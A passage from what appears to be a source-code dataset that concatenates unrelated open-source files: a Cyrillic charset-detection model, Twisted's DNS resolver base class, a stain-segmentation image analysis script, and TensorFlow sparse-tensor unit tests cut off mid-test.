2,3,3,3,3,0,0,0,0,1,0,0,0,0,3,0,1,2,1,0,0,0,0,0,0,0,1,1,0,0,1,1,
1,0,1,0,1,2,0,0,1,1,2,1,0,1,1,1,1,0,1,1,1,1,0,1,0,0,1,0,0,1,1,0,
2,2,3,2,2,2,3,1,2,2,2,2,2,2,2,2,1,1,1,1,1,1,1,0,1,0,1,1,1,0,2,1,
1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,1,0,1,1,0,
3,3,3,2,2,2,2,3,2,2,1,1,2,2,2,2,1,1,3,1,2,1,2,0,0,1,1,0,1,0,2,1,
1,1,1,1,1,2,1,0,1,1,1,1,0,1,0,0,1,1,0,0,1,0,1,0,0,1,0,0,0,1,1,0,
2,0,0,1,0,3,2,2,2,2,1,2,1,2,1,2,0,0,0,2,1,2,2,1,1,2,2,0,1,1,0,2,
1,1,1,1,1,0,1,1,1,2,1,1,1,2,1,0,1,2,1,1,1,1,0,1,1,1,0,0,1,0,0,1,
1,3,2,2,2,1,1,1,2,3,0,0,0,0,2,0,2,2,1,0,0,0,0,0,0,1,0,0,0,0,1,1,
1,0,1,1,0,1,0,1,1,0,1,1,0,2,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,
2,3,2,3,2,1,2,2,2,2,1,0,0,0,2,0,0,1,1,0,0,0,0,0,0,0,1,1,0,0,2,1,
1,1,2,1,0,2,0,0,1,0,1,0,0,1,0,0,1,1,0,1,1,0,0,0,0,0,1,0,0,0,0,0,
3,0,0,1,0,2,2,2,3,2,2,2,2,2,2,2,0,0,0,2,1,2,1,1,1,2,2,0,0,0,1,2,
1,1,1,1,1,0,1,2,1,1,1,1,1,1,1,0,1,1,1,1,1,1,0,1,1,1,1,1,1,0,0,1,
2,3,2,3,3,2,0,1,1,1,0,0,1,0,2,0,1,1,3,1,0,0,0,0,0,0,0,1,0,0,2,1,
1,1,1,1,1,1,1,0,1,0,1,1,1,1,0,1,1,1,0,0,1,1,0,1,0,0,0,0,0,0,1,0,
2,3,3,3,3,1,2,2,2,2,0,1,1,0,2,1,1,1,2,1,0,1,1,0,0,1,0,1,0,0,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,2,0,0,1,1,2,2,1,0,0,2,0,1,1,3,0,0,1,0,0,0,0,0,1,0,1,2,1,
1,1,2,0,1,1,1,0,1,0,1,1,0,1,0,1,1,1,1,0,1,0,0,0,0,0,0,1,0,1,1,0,
1,3,2,3,2,1,0,0,2,2,2,0,1,0,2,0,1,1,1,0,1,0,0,0,3,0,1,1,0,0,2,1,
1,1,1,0,1,1,0,0,0,0,1,1,0,1,0,0,2,1,1,0,1,0,0,0,1,0,1,0,0,1,1,0,
3,1,2,1,1,2,2,2,2,2,2,1,2,2,1,1,0,0,0,2,2,2,0,0,0,1,2,1,0,1,0,1,
2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,2,1,1,1,0,1,0,1,1,0,1,1,1,0,0,1,
3,0,0,0,0,2,0,1,1,1,1,1,1,1,0,1,0,0,0,1,1,1,0,1,0,1,1,0,0,1,0,1,
1,1,0,0,1,0,0,0,1,0,1,1,0,0,1,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,1,
1,3,3,2,2,0,0,0,2,2,0,0,0,1,2,0,1,1,2,0,0,0,0,0,0,0,0,1,0,0,2,1,
0,1,1,0,0,1,1,0,0,0,1,1,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,
2,3,2,3,2,0,0,0,0,1,1,0,0,0,2,0,2,0,2,0,0,0,0,0,1,0,0,1,0,0,1,1,
1,1,2,0,1,2,1,0,1,1,2,1,1,1,1,1,2,1,1,0,1,0,0,1,1,1,1,1,0,1,1,0,
1,3,2,2,2,1,0,0,2,2,1,0,1,2,2,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,1,
0,0,1,1,0,1,1,0,0,1,1,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,1,0,2,3,1,2,2,2,2,2,2,1,1,0,0,0,1,0,1,0,2,1,1,1,0,0,0,0,1,
1,1,0,1,1,0,1,1,1,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,
2,0,2,0,0,1,0,3,2,1,2,1,2,2,0,1,0,0,0,2,1,0,0,2,1,1,1,1,0,2,0,2,
2,1,1,1,1,1,1,1,1,1,1,1,1,2,1,0,1,1,1,1,0,0,0,1,1,1,1,0,1,0,0,1,
1,2,2,2,2,1,0,0,1,0,0,0,0,0,2,0,1,1,1,1,0,0,0,0,1,0,1,2,0,0,2,0,
1,0,1,1,1,2,1,0,1,0,1,1,0,0,1,0,1,1,1,0,1,0,0,0,1,0,0,1,0,1,1,0,
2,1,2,2,2,0,3,0,1,1,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
0,0,0,1,1,1,0,0,1,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,
1,2,2,3,2,2,0,0,1,1,2,0,1,2,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,
0,1,1,0,0,1,1,0,0,1,1,0,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,
2,2,1,1,2,1,2,2,2,2,2,1,2,2,0,1,0,0,0,1,2,2,2,1,2,1,1,1,1,1,2,1,
1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,0,1,1,1,0,1,1,0,0,1,
1,2,2,2,2,0,1,0,2,2,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,
0,0,1,0,0,1,0,0,0,0,1,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,0,0,2,2,2,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,
0,1,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,0,0,0,1,0,0,1,1,2,0,0,0,0,1,0,1,0,0,1,0,0,2,0,0,0,1,
0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,1,1,2,0,2,1,1,1,1,0,2,2,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,1,
0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
1,0,2,1,2,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,
0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,
1,0,0,0,0,2,0,1,2,1,0,1,1,1,0,1,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,1,
0,0,0,0,0,1,0,0,1,1,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,
2,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
1,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
1,1,1,0,1,0,1,0,0,1,1,1,1,0,0,0,1,0,0,0,0,1,0,0,0,1,0,1,0,0,0,0,
1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
1,1,0,1,1,0,1,0,1,0,0,0,0,1,1,0,1,1,0,0,0,0,0,1,0,1,1,0,1,0,0,0,
0,1,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,
)
# Each model bundles a byte -> frequency-order map for one Cyrillic
# encoding with the shared Russian bigram precedence matrix defined
# above; all share the measured typical-positive ratio of
# RussianLangModel.
Koi8rModel = {
    'charToOrderMap': KOI8R_CharToOrderMap,
    'precedenceMatrix': RussianLangModel,
    'mTypicalPositiveRatio': 0.976601,
    'keepEnglishLetter': False,
    'charsetName': "KOI8-R"
}

Win1251CyrillicModel = {
    'charToOrderMap': win1251_CharToOrderMap,
    'precedenceMatrix': RussianLangModel,
    'mTypicalPositiveRatio': 0.976601,
    'keepEnglishLetter': False,
    'charsetName': "windows-1251"
}

Latin5CyrillicModel = {
    'charToOrderMap': latin5_CharToOrderMap,
    'precedenceMatrix': RussianLangModel,
    'mTypicalPositiveRatio': 0.976601,
    'keepEnglishLetter': False,
    'charsetName': "ISO-8859-5"
}

# (stray trailing semicolon removed)
MacCyrillicModel = {
    'charToOrderMap': macCyrillic_CharToOrderMap,
    'precedenceMatrix': RussianLangModel,
    'mTypicalPositiveRatio': 0.976601,
    'keepEnglishLetter': False,
    'charsetName': "MacCyrillic"
}

Ibm866Model = {
    'charToOrderMap': IBM866_CharToOrderMap,
    'precedenceMatrix': RussianLangModel,
    'mTypicalPositiveRatio': 0.976601,
    'keepEnglishLetter': False,
    'charsetName': "IBM866"
}

Ibm855Model = {
    'charToOrderMap': IBM855_CharToOrderMap,
    'precedenceMatrix': RussianLangModel,
    'mTypicalPositiveRatio': 0.976601,
    'keepEnglishLetter': False,
    'charsetName': "IBM855"
}
# flake8: noqa
| gpl-3.0 |
fxia22/ASM_xf | PythonD/site_python/twisted/names/common.py | 2 | 6631 |
# Twisted, the Framework of Your Internet
# Copyright (C) 2001 Matthew W. Lefkowitz
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of version 2.1 of the GNU Lesser General Public
# License as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import operator, sys, socket, random
from twisted.protocols import dns
from twisted.internet import defer, error
from twisted.python import failure, log
EMPTY_RESULT = (), (), ()
class ResolverBase:
    """Shared lookup plumbing for DNS resolvers.

    Subclasses implement the actual resolution by overriding
    ``_lookup``; every ``lookupXxx`` helper below delegates to it with
    the matching DNS record type.  NOTE: this is Python 2 code
    (``except KeyError, e`` and tuple-parameter unpacking below).
    """

    # Instance map of DNS type constant -> bound lookup method, built in
    # __init__ from the module-level `typeToMethod` table.
    typeToMethod = None

    def __init__(self):
        self.typeToMethod = {}
        for (k, v) in typeToMethod.items():
            self.typeToMethod[k] = getattr(self, v)

    def query(self, query, timeout = None):
        """Dispatch *query* by record type.

        Unknown record types produce a failed Deferred rather than
        raising synchronously.
        """
        try:
            return self.typeToMethod[query.type](str(query.name), timeout)
        except KeyError, e:
            return defer.fail(failure.Failure(NotImplementedError(str(self.__class__) + " " + str(query.type))))

    def _lookup(self, name, cls, type, timeout):
        # Subclass responsibility: perform the actual DNS lookup.
        raise NotImplementedError("ResolverBase._lookup")

    # --- One thin wrapper per DNS record type; each fixes the class
    # (IN) and record type for _lookup(). ---
    def lookupAddress(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.A, timeout)

    def lookupIPV6Address(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.AAAA, timeout)

    def lookupAddress6(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.A6, timeout)

    def lookupMailExchange(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.MX, timeout)

    def lookupNameservers(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.NS, timeout)

    def lookupCanonicalName(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.CNAME, timeout)

    def lookupMailBox(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.MB, timeout)

    def lookupMailGroup(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.MG, timeout)

    def lookupMailRename(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.MR, timeout)

    def lookupPointer(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.PTR, timeout)

    def lookupAuthority(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.SOA, timeout)

    def lookupNull(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.NULL, timeout)

    def lookupWellKnownServices(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.WKS, timeout)

    def lookupService(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.SRV, timeout)

    def lookupHostInfo(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.HINFO, timeout)

    def lookupMailboxInfo(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.MINFO, timeout)

    def lookupText(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.TXT, timeout)

    def lookupResponsibility(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.RP, timeout)

    def lookupAFSDatabase(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.AFSDB, timeout)

    def lookupZone(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.AXFR, timeout)

    def lookupAllRecords(self, name, timeout = None):
        return self._lookup(name, dns.IN, dns.ALL_RECORDS, timeout)

    def getHostByName(self, name, timeout = None, effort = 10):
        """Resolve *name* to an address string via an ALL_RECORDS query.

        `effort` bounds how deep extractRecord chases CNAME chains.
        """
        # XXX - respect timeout
        return self._lookup(name, dns.IN, dns.ALL_RECORDS, timeout).addCallback(
            self._cbRecords, name, effort
        )

    def _cbRecords(self, (ans, auth, add), name, effort):
        # Python 2 tuple-parameter unpacking of the (answers, authority,
        # additional) triple produced by _lookup.
        result = extractRecord(self, dns.Name(name), ans + auth + add, effort)
        if not result:
            raise error.DNSLookupError(name)
        return result
if hasattr(socket, 'inet_ntop'):
    # IPv6-capable platform: prefer A6, then AAAA, then A records,
    # chasing CNAME chains at most `level` hops deep.
    def extractRecord(resolver, name, answers, level = 10):
        # Recursion-depth guard: give up once the CNAME budget is spent.
        if not level:
            return None
        for r in answers:
            if r.name == name and r.type == dns.A6:
                return socket.inet_ntop(socket.AF_INET6, r.payload.address)
        for r in answers:
            if r.name == name and r.type == dns.AAAA:
                return socket.inet_ntop(socket.AF_INET6, r.payload.address)
        for r in answers:
            if r.name == name and r.type == dns.A:
                return socket.inet_ntop(socket.AF_INET, r.payload.address)
        for r in answers:
            if r.name == name and r.type == dns.CNAME:
                # Follow the alias within this answer set first; fall
                # back to a fresh lookup with the remaining budget.
                result = extractRecord(resolver, r.payload.name, answers, level - 1)
                if not result:
                    return resolver.getHostByName(str(r.payload.name), effort=level-1)
                return result
else:
    # No inet_ntop available: IPv4 only (A records plus CNAME chasing).
    def extractRecord(resolver, name, answers, level = 10):
        if not level:
            return None
        for r in answers:
            if r.name == name and r.type == dns.A:
                return socket.inet_ntoa(r.payload.address)
        for r in answers:
            if r.name == name and r.type == dns.CNAME:
                result = extractRecord(resolver, r.payload.name, answers, level - 1)
                if not result:
                    return resolver.getHostByName(str(r.payload.name), effort=level-1)
                return result
# Maps DNS record-type constants to the name of the ResolverBase method
# that performs the corresponding lookup; consumed by
# ResolverBase.__init__ to build each instance's dispatch table.
typeToMethod = {
    dns.A: 'lookupAddress',
    dns.AAAA: 'lookupIPV6Address',
    dns.A6: 'lookupAddress6',
    dns.NS: 'lookupNameservers',
    dns.CNAME: 'lookupCanonicalName',
    dns.SOA: 'lookupAuthority',
    dns.MB: 'lookupMailBox',
    dns.MG: 'lookupMailGroup',
    dns.MR: 'lookupMailRename',
    dns.NULL: 'lookupNull',
    dns.WKS: 'lookupWellKnownServices',
    dns.PTR: 'lookupPointer',
    dns.HINFO: 'lookupHostInfo',
    dns.MINFO: 'lookupMailboxInfo',
    dns.MX: 'lookupMailExchange',
    dns.TXT: 'lookupText',
    dns.RP: 'lookupResponsibility',
    dns.AFSDB: 'lookupAFSDatabase',
    dns.SRV: 'lookupService',
    dns.AXFR: 'lookupZone',
    dns.ALL_RECORDS: 'lookupAllRecords',
}
| gpl-2.0 |
griffincalme/MicroDeconvolution | website/MicroDeconvolution/RandomWalkScript.py | 1 | 5032 | import numpy as np
from numpy import linalg
import matplotlib.pyplot as plt
from skimage.exposure import rescale_intensity
from skimage.segmentation import random_walker
from skimage.color import separate_stains
from skimage.color import rgb2grey
from skimage.io import imread
import time
from pyamg import *
# Colour-deconvolution stain matrix for the HRD space.
# Rows are the RGB absorption vectors of Hematoxylin(0), GBI red(1),
# DAB(2).
rgb_from_hrd = np.array([[0.65, 0.70, 0.29],
                         [0.1, 0.95, 0.95],
                         [0.27, 0.57, 0.78]])
# Inverse matrix: converts an RGB image into HRD stain space
# (used by skimage.color.separate_stains).
hrd_from_rgb = linalg.inv(rgb_from_hrd)
def stainspace_to_2d_array(ihc_xyz, channel):
    """Extract one stain channel from a deconvolved image as a grey 2-D array.

    The selected plane is rescaled to [0, 1], stacked into a pseudo-RGB
    image (zeros in the first band, the rescaled plane in the other two)
    and converted to greyscale.
    """
    channel_plane = ihc_xyz[:, :, channel]
    rescaled = rescale_intensity(channel_plane, out_range=(0, 1))
    pseudo_rgb = np.dstack((np.zeros_like(rescaled), rescaled, rescaled))
    return rgb2grey(pseudo_rgb)
def get_markers(grey_array, bottom_thresh, top_thresh):
    """Build random-walker seed markers from a grey-level image.

    Pixels darker than ``bottom_thresh`` are labelled 1 and pixels
    brighter than ``top_thresh`` are labelled 2; everything in between
    stays 0 (unlabelled, to be filled in by the random walker).
    """
    below = grey_array < bottom_thresh
    above = grey_array > top_thresh
    seeds = np.zeros_like(grey_array)
    seeds[below] = 1
    seeds[above] = 2
    return seeds
def random_walk_segmentation(input_image, output_folder):
    """Segment an IHC image into DAB, GBI-red and Hematoxylin masks.

    Deconvolves the RGB image at path `input_image` into HRD stain
    space, random-walk segments each channel, computes coverage
    statistics, saves a 2x2 result figure into `output_folder`, and
    returns the saved figure's base filename.
    """
    input_image = imread(input_image)
    ihc_hrd = separate_stains(input_image, hrd_from_rgb)
    # Per-stain grey images (channel order in this stain space:
    # Hema=0, GBI red=1, DAB=2).
    DAB_Grey_Array = stainspace_to_2d_array(ihc_hrd, 2)
    Hema_Gray_Array = stainspace_to_2d_array(ihc_hrd, 0)
    GBIred_Gray_Array = stainspace_to_2d_array(ihc_hrd, 1)
    #Perform Random Walker, fills in positive regions
    DAB_segmentation = random_walker(DAB_Grey_Array, get_markers(DAB_Grey_Array, .3, .5), beta=130, mode='cg_mg')
    Hema_segmentation = random_walker(Hema_Gray_Array, get_markers(Hema_Gray_Array, .2, .4), beta=130, mode='cg_mg')
    GBIred_segmentation = random_walker(GBIred_Gray_Array, get_markers(GBIred_Gray_Array, .4, .5), beta=130,
                                        mode='cg_mg')
    '''Compute and Output'''
    #Compute and output percentages of pixels stained by each chromagen
    pic_dimensions = np.shape(DAB_segmentation)  # both arrays same shape
    total_pixels = pic_dimensions[0] * pic_dimensions[1]
    #Change negative pixel values from 1 -> 0, positives 2 -> 1
    subtrahend_array = np.ones_like(DAB_segmentation)
    DAB_segmentation = np.subtract(DAB_segmentation, subtrahend_array)
    Hema_segmentation = np.subtract(Hema_segmentation, subtrahend_array)
    GBIred_segmentation = np.subtract(GBIred_segmentation, subtrahend_array)
    #Count positive pixels
    DAB_pixels = np.count_nonzero(DAB_segmentation)
    Hema_pixels = np.count_nonzero(Hema_segmentation)
    red_pixels = np.count_nonzero(GBIred_segmentation)
    #Percent of image covered by positive staining
    DAB_coverage_percent = (round((DAB_pixels / total_pixels * 100), 1))
    Hema_coverage_percent = (round((Hema_pixels / total_pixels * 100), 1))
    #An overlay of the DAB and Hematoxylin segmented images, for total cellular area
    total_cell_array = np.add(DAB_segmentation, Hema_segmentation)
    #Number of pixels covered by cellular area
    total_cell_pixels = np.count_nonzero(total_cell_array)
    #Percent of image covered by cellular area (DAB OR Hematoxylin)
    total_cell_percent = (round((total_cell_pixels / total_pixels * 100), 1))
    #The percentage of DAB/CD3+ cells out of the total number of cells
    percent_pos_cells = (round((DAB_pixels / total_cell_pixels * 100), 1))
    #The percentage of the image covered by cytokines
    Red_coverage_percent = (round((red_pixels / total_pixels * 100), 1))
    red_plus_total_array = np.add(total_cell_array, GBIred_segmentation)
    red_plus_total_pixels = np.count_nonzero(red_plus_total_array)
    #The percentage of the area covered by cytokines, with non-cellular regions subtracted
    adjusted_red_coverage_percent = (round((red_pixels / red_plus_total_pixels * 100), 1))
    # NOTE(review): the percentage statistics above are computed but not
    # returned (see the commented-out tail of the return statement) —
    # confirm whether they should be persisted, e.g. to CSV as the TODO
    # below suggests.
    # Plot images
    fig, axes = plt.subplots(2, 2, figsize=(12, 11))
    ax0, ax1, ax2, ax3 = axes.ravel()
    ax0.imshow(input_image, cmap=plt.cm.gray, interpolation='nearest')
    ax0.set_title("Original")
    ax1.imshow(DAB_segmentation, cmap=plt.cm.gray, interpolation='nearest')
    ax1.set_title("DAB")
    ax2.imshow(GBIred_segmentation, cmap=plt.cm.gray)
    ax2.set_title("GBI red")
    ax3.imshow(Hema_segmentation, cmap=plt.cm.gray)
    ax3.set_title("Hematoxylin")
    for ax in axes.ravel():
        ax.axis('off')
    fig.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=None, hspace=None)
    # Timestamped output name keeps successive runs from overwriting
    # each other.
    output_filename = 'output' + time.strftime("%Y-%m-%d %H:%M:%S")
    plt.savefig(output_folder + output_filename)
    #do a save csv here, maybe delete return statement after this comment
    return output_filename#, DAB_coverage_percent, Hema_coverage_percent, total_cell_percent, percent_pos_cells, Red_coverage_percent, adjusted_red_coverage_percent
#--- Test ---
#file_path = '/home/griffin/Desktop/MicroDeconvolution/TestingScripts/SamplePics/TestImage.jpg'
#save_directory = '/home/griffin/Desktop/MicroDeconvolution/website/media/images/output/'
#random_walk_segmentation(file_path, save_directory)
| apache-2.0 |
codrut3/tensorflow | tensorflow/contrib/layers/python/ops/sparse_ops_test.py | 75 | 13684 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.contrib.layers.python.ops.sparse_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.layers.python.ops import sparse_ops
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
def _assert_sparse_tensor_value(test_case, expected, actual):
test_case.assertEqual(np.int64, np.array(actual.indices).dtype)
test_case.assertAllEqual(expected.indices, actual.indices)
test_case.assertEqual(
np.array(expected.values).dtype, np.array(actual.values).dtype)
test_case.assertAllEqual(expected.values, actual.values)
test_case.assertEqual(np.int64, np.array(actual.dense_shape).dtype)
test_case.assertAllEqual(expected.dense_shape, actual.dense_shape)
class DenseToSparseTensorTest(test.TestCase):
  """Tests for `sparse_ops.dense_to_sparse_tensor`.

  Covers 1-D/2-D/3-D inputs, several value dtypes, a custom ignore value,
  and inputs whose static shape or rank is unknown at graph-build time.
  """

  def test_dense_to_sparse_tensor_1d(self):
    with self.test_session() as sess:
      st = sparse_ops.dense_to_sparse_tensor([1, 0, 2, 0])
      result = sess.run(st)
      # Indices and dense_shape are always int64; values keep the input dtype.
      self.assertEqual(result.indices.dtype, np.int64)
      self.assertEqual(result.values.dtype, np.int32)
      self.assertEqual(result.dense_shape.dtype, np.int64)
      self.assertAllEqual([[0], [2]], result.indices)
      self.assertAllEqual([1, 2], result.values)
      self.assertAllEqual([4], result.dense_shape)

  def test_dense_to_sparse_tensor_1d_float(self):
    with self.test_session() as sess:
      st = sparse_ops.dense_to_sparse_tensor([1.5, 0.0, 2.3, 0.0])
      result = sess.run(st)
      self.assertEqual(result.indices.dtype, np.int64)
      self.assertEqual(result.values.dtype, np.float32)
      self.assertEqual(result.dense_shape.dtype, np.int64)
      self.assertAllEqual([[0], [2]], result.indices)
      self.assertAllClose([1.5, 2.3], result.values)
      self.assertAllEqual([4], result.dense_shape)

  def test_dense_to_sparse_tensor_1d_bool(self):
    with self.test_session() as sess:
      st = sparse_ops.dense_to_sparse_tensor([True, False, True, False])
      result = sess.run(st)
      self.assertEqual(result.indices.dtype, np.int64)
      # NOTE(review): np.bool / np.object (also used below) are deprecated
      # aliases removed in NumPy 1.24; fine for the NumPy this code targets.
      self.assertEqual(result.values.dtype, np.bool)
      self.assertEqual(result.dense_shape.dtype, np.int64)
      self.assertAllEqual([[0], [2]], result.indices)
      self.assertAllEqual([True, True], result.values)
      self.assertAllEqual([4], result.dense_shape)

  def test_dense_to_sparse_tensor_1d_str(self):
    with self.test_session() as sess:
      st = sparse_ops.dense_to_sparse_tensor([b'qwe', b'', b'ewq', b''])
      result = sess.run(st)
      self.assertEqual(result.indices.dtype, np.int64)
      self.assertEqual(result.values.dtype, np.object)
      self.assertEqual(result.dense_shape.dtype, np.int64)
      self.assertAllEqual([[0], [2]], result.indices)
      self.assertAllEqual([b'qwe', b'ewq'], result.values)
      self.assertAllEqual([4], result.dense_shape)

  def test_dense_to_sparse_tensor_1d_str_special_ignore(self):
    with self.test_session() as sess:
      # With an explicit ignore_value, empty strings are kept and b'qwe'
      # becomes the value that is dropped.
      st = sparse_ops.dense_to_sparse_tensor(
          [b'qwe', b'', b'ewq', b''], ignore_value=b'qwe')
      result = sess.run(st)
      self.assertEqual(result.indices.dtype, np.int64)
      self.assertEqual(result.values.dtype, np.object)
      self.assertEqual(result.dense_shape.dtype, np.int64)
      self.assertAllEqual([[1], [2], [3]], result.indices)
      self.assertAllEqual([b'', b'ewq', b''], result.values)
      self.assertAllEqual([4], result.dense_shape)

  def test_dense_to_sparse_tensor_2d(self):
    with self.test_session() as sess:
      st = sparse_ops.dense_to_sparse_tensor([[1, 2, 0, 0], [3, 4, 5, 0]])
      result = sess.run(st)
      self.assertAllEqual([[0, 0], [0, 1], [1, 0], [1, 1], [1, 2]],
                          result.indices)
      self.assertAllEqual([1, 2, 3, 4, 5], result.values)
      self.assertAllEqual([2, 4], result.dense_shape)

  def test_dense_to_sparse_tensor_3d(self):
    with self.test_session() as sess:
      st = sparse_ops.dense_to_sparse_tensor([[[1, 2, 0, 0], [3, 4, 5, 0]],
                                              [[7, 8, 0, 0], [9, 0, 0, 0]]])
      result = sess.run(st)
      self.assertAllEqual([[0, 0, 0], [0, 0, 1], [0, 1, 0], [0, 1, 1], [0, 1, 2],
                           [1, 0, 0], [1, 0, 1], [1, 1, 0]], result.indices)
      self.assertAllEqual([1, 2, 3, 4, 5, 7, 8, 9], result.values)
      self.assertAllEqual([2, 2, 4], result.dense_shape)

  def test_dense_to_sparse_tensor_unknown_1d_shape(self):
    with self.test_session() as sess:
      tensor = array_ops.placeholder(shape=[None], dtype=dtypes.int32)
      st = sparse_ops.dense_to_sparse_tensor(tensor)
      result = sess.run(st, feed_dict={tensor: [0, 100, 0, 3]})
      self.assertAllEqual([[1], [3]], result.indices)
      self.assertAllEqual([100, 3], result.values)
      self.assertAllEqual([4], result.dense_shape)

  def test_dense_to_sparse_tensor_unknown_3d_shape(self):
    with self.test_session() as sess:
      tensor = array_ops.placeholder(
          shape=[None, None, None], dtype=dtypes.int32)
      st = sparse_ops.dense_to_sparse_tensor(tensor)
      result = sess.run(st,
                        feed_dict={
                            tensor: [[[1, 2, 0, 0], [3, 4, 5, 0]],
                                     [[7, 8, 0, 0], [9, 0, 0, 0]]]
                        })
      self.assertAllEqual([[0, 0, 0], [0, 0, 1], [0, 1, 0], [0, 1, 1], [0, 1, 2],
                           [1, 0, 0], [1, 0, 1], [1, 1, 0]], result.indices)
      self.assertAllEqual([1, 2, 3, 4, 5, 7, 8, 9], result.values)
      self.assertAllEqual([2, 2, 4], result.dense_shape)

  def test_dense_to_sparse_unknown_rank(self):
    # Rank is only known at feed time here.
    ph = array_ops.placeholder(dtype=dtypes.int32)
    with self.test_session() as sess:
      st = sparse_ops.dense_to_sparse_tensor(ph)
      result = sess.run(st, feed_dict={ph: [[1, 2, 0, 0], [3, 4, 5, 0]]})
      self.assertAllEqual([[0, 0], [0, 1], [1, 0], [1, 1], [1, 2]],
                          result.indices)
      self.assertAllEqual([1, 2, 3, 4, 5], result.values)
      self.assertAllEqual([2, 4], result.dense_shape)
class SparseRowEnvelopeTest(test.TestCase):
  """Tests for `sparse_ops.sparse_row_envelope`.

  The fixtures show the envelope is the per-row count of populated entries
  along the innermost (or requested) axis.
  """

  def test_sparse_row_envelope(self):
    expected_sparse_row_envelope = [1, 0, 3]
    with self.test_session() as sess:
      sparse_input = sparse_tensor.SparseTensor(
          indices=[[0, 0], [2, 0], [2, 1], [2, 2]],
          values=[0, 1, 2, 3],
          dense_shape=[3, 3])
